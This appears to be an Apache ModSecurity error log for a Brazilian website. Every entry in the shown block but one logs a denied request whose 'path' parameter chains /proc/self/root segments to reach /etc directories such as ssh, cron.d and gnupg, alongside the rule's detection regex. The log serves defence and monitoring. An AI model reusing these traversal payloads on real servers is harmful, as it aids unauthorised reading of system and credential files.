[Mon Mar 16 17:59:12.980830 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.241.46:40752] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvIM_BxrYCr4hPDw8F5gAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:59:14.294906 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:40754] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvIqTCbgAP5jq5TehG7AAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:59:23.958859 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:40760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvK46lpbStxTqkSkuEqAAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:59:29.597095 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.241.46:35994] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvMaQpVkWug9HeOt9PDQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:59:36.280022 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:50204] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvOP9ocpUE4ed4uDwO2gAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:59:42.951619 2026] [:error] [pid 29507:tid 140411548894976] [client 74.7.241.46:50218] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvPkr9dMAiw-8KANNkFwAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:59:58.430797 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.244.31:58954] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhvTlajLEzk2WiQ-10t5gAAApI"]
[Mon Mar 16 17:59:58.819548 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.241.46:38094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvTkr9dMAiw-8KANNkJQAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:00:01.439596 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:58052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvUf9ocpUE4ed4uDwO3QAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:00:06.155454 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.241.46:58054] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvVlajLEzk2WiQ-10t6wAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:00:08.599239 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:58056] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvWKQpVkWug9HeOt9PEwAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:00:14.995684 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:56142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvXqTCbgAP5jq5TehHVwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:00:21.592571 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.241.46:43186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvZVajLEzk2WiQ-10t_AAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:01:08.009040 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.243.203:37208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvlFajLEzk2WiQ-10uKQAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:09.598588 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.243.203:51872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvlVajLEzk2WiQ-10uKwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:01:10.930213 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.243.203:33618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvlqTCbgAP5jq5TehHaQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:01:12.183238 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:33624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvmLysWC90G-1nBrBgEQAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:13.420297 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.243.203:33636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvmaTCbgAP5jq5TehHagAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:14.752475 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.243.203:33642] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvmqTCbgAP5jq5TehHbAAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:15.919733 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:33644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvm7ysWC90G-1nBrBgEgAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:01:17.299028 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.243.203:33658] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvnbysWC90G-1nBrBgEwAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:19.185443 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:33674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvntSswJuvopo3lOh7UgAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
